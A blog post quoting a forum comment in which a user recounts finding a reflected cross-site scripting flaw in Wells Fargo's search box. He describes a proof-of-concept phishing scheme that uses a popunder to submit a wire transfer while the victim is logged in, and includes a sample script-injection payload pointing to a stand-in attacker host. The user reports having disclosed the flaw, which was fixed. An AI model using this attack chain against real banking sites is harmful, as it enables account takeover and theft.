My favourite comment so far…

Unsurprising (Score:5, Informative)

by karmatic (776420) on Tuesday September 30, @02:06AM (#25201899)

This really isn’t that surprising. A number of years ago, I was in a Wells Fargo branch; their kiosks are limited to showing only wellsfargo.com.

So, in an attempt to get to another site, I typed some HTML into the search box on their homepage, and pretty much every page on their site. Sure enough, it inserted the HTML into the page without any problems.

So, I got home, and whipped up a phishing email. It went to wellsfargo.com, used a little javascript to do a popunder, and set window.location to wellsfargo.com. The popunder self-refreshed every few seconds, and checked the cookies to see when the user had logged in. After the user logs in, it waits 9 minutes (auto-logout was 10 minutes), and then would build a form to initiate a wire transfer, and submit it – while the user was still logged in. It would then close the popunder.

So, with a simple link to a search for something like <script src=”http://evilsite.tld”>, I could take complete control over someone’s bank account. This would be easy to pull off with an email saying something like “We have detected suspicious activity; click here to log on to wellsfargo.com”. It really would take them to wellsfargo.com, and they could log in. You don’t need a user/password if you control the browser.

I let them know that day, and explained how one escapes HTML. To their credit, it was fixed in a very short period of time. That still doesn’t excuse that 1) they should know better, and 2) if you’re going to check anything, it should be the one form that’s on every page.